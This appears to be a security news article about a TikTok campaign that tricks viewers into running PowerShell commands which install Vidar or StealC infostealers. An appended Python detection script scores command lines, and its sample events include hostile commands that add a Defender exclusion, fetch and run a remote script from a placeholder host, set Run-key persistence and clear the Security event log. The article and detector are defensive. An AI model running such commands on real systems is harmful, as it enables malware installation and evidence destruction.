AI-Generated TikTok Videos Used to Distribute Infostealer Malware

A new malware campaign has been observed using TikTok’s viral nature and vast user base to spread information-stealing malware such as Vidar and StealC.
According to a new advisory by Trend Micro, this latest social engineering effort marks a shift from traditional malicious tactics, exploiting the platform’s reach and user trust to spread harmful software via seemingly innocuous video content.
TikTok Videos Deliver Malware via PowerShell
Unlike previous campaigns that depended on malicious websites and JavaScript injections, this attack operates entirely within TikTok.
The campaign features short-form videos, likely created with AI tools, that instruct users to execute PowerShell commands. These commands, presented as methods to activate popular software like Microsoft Office or Spotify, initiate a malware infection chain.
What sets this tactic apart is its use of verbal and visual guidance in the videos. The commands are never embedded in text or links, making them harder for traditional security systems to detect. Viewers are coaxed into typing the commands themselves, making them unwitting participants in the malware installation.
Trend Micro researchers traced the campaign to accounts including @gitallowed, @zane.houghton and @digitaldreams771.
These accounts, now inactive, published similar AI-voiced videos with minor variations in camera angles and payload URLs, suggesting automation was used in their creation.
One video in particular gained nearly 500,000 views and over 20,000 likes. Its popularity indicates significant user interaction, increasing the risk that many followed the instructions and infected their systems.
The malware chain begins by using PowerShell to download a script from allaivo[.]me, which then fetches and installs Vidar or StealC.
The malicious PowerShell script:
- Hides files in user directories and adds them to Windows Defender’s exclusion list
- Downloads malware from amssh[.]co
- Uses retry logic to ensure execution
- Sets up system persistence
- Cleans up forensic evidence to avoid detection
Vidar further masks its command-and-control (C2) infrastructure by embedding IP data in services like Steam and Telegram.
A Call for Smarter Defenses
According to Trend Micro, the campaign highlights the urgent need for updated defense strategies that go beyond traditional threat detection.
Organizations should actively monitor social media platforms for high-engagement posts that contain technical instructions, as these may be linked to malicious activity.
Implementing behavioral detection tools is also essential to flag unusual user actions, such as unexpected command-line executions.
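As an added example (not from the Trend Micro advisory or this article), the script below shows what the behavioral detection suggested here could look like when run over PowerShell command-line telemetry: it scores each command against indicators matching the behaviours listed above (Defender exclusions, downloads, persistence, log clearing) and alerts only when several co-occur, so a lone download is not flagged. The cmdlet patterns and the sample events are assumptions constructed for illustration, not the campaign's actual script or real logs.

```python
import re
from dataclasses import dataclass, field

# Each rule: (indicator name, weight, case-insensitive regex). The cmdlets are the
# kinds of commands that would implement the behaviours the advisory describes;
# they are assumptions, not the campaign's actual script.
RULES = [
    ("defender_exclusion", 4, r"add-mppreference\b.*-exclusion(path|process|extension)"),
    ("download_cradle", 3, r"\b(invoke-webrequest|iwr|curl|wget|downloadstring|downloadfile)\b"),
    ("inline_execution", 3, r"\b(iex|invoke-expression)\b"),
    ("run_key_persistence", 3, r"currentversion\\run\b"),
    ("log_clearing", 4, r"(wevtutil\s+cl\b|clear-eventlog\b)"),
    ("hidden_attribute", 2, r"attrib\s+\+h|\[io\.fileattributes\]::hidden"),
]
ALERT_THRESHOLD = 6  # a single download or single iex stays below the bar

@dataclass
class Finding:
    event_id: str
    score: int
    indicators: list = field(default_factory=list)

def score_command(cmdline):
    """Return (total weight, matched indicator names) for one command line."""
    hits = [name for name, _, pat in RULES if re.search(pat, cmdline, re.IGNORECASE)]
    score = sum(w for name, w, _ in RULES if name in hits)
    return score, hits

def analyze(events):
    """Emit a Finding for every event whose combined indicator weight reaches the threshold."""
    findings = []
    for ev in events:
        score, hits = score_command(ev["cmdline"])
        if score >= ALERT_THRESHOLD:
            findings.append(Finding(ev["id"], score, hits))
    return findings

# Constructed sample script-block events (not real telemetry); hosts are placeholders.
SAMPLE_EVENTS = [
    {"id": "evt-1", "cmdline": "Get-ChildItem C:\\Users\\alice\\Documents"},
    {"id": "evt-2", "cmdline": "Invoke-WebRequest https://example.invalid/update.zip -OutFile u.zip"},
    {"id": "evt-3", "cmdline": "Add-MpPreference -ExclusionPath $env:APPDATA\\x; iex (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"},
    {"id": "evt-4", "cmdline": "Set-ItemProperty HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -Name u -Value $p; wevtutil cl Security"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f.event_id, f.score, ", ".join(f.indicators))
```

Only evt-3 and evt-4 reach the threshold; the benign directory listing and the stand-alone download do not, which is the point of weighting co-occurring behaviours rather than single cmdlets.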
Additionally, user education must evolve to include guidance on recognizing and reporting deceptive video content, especially content that applies social engineering tactics through visual and auditory cues.
Image credit: BongkarnGraphic / Shutterstock.com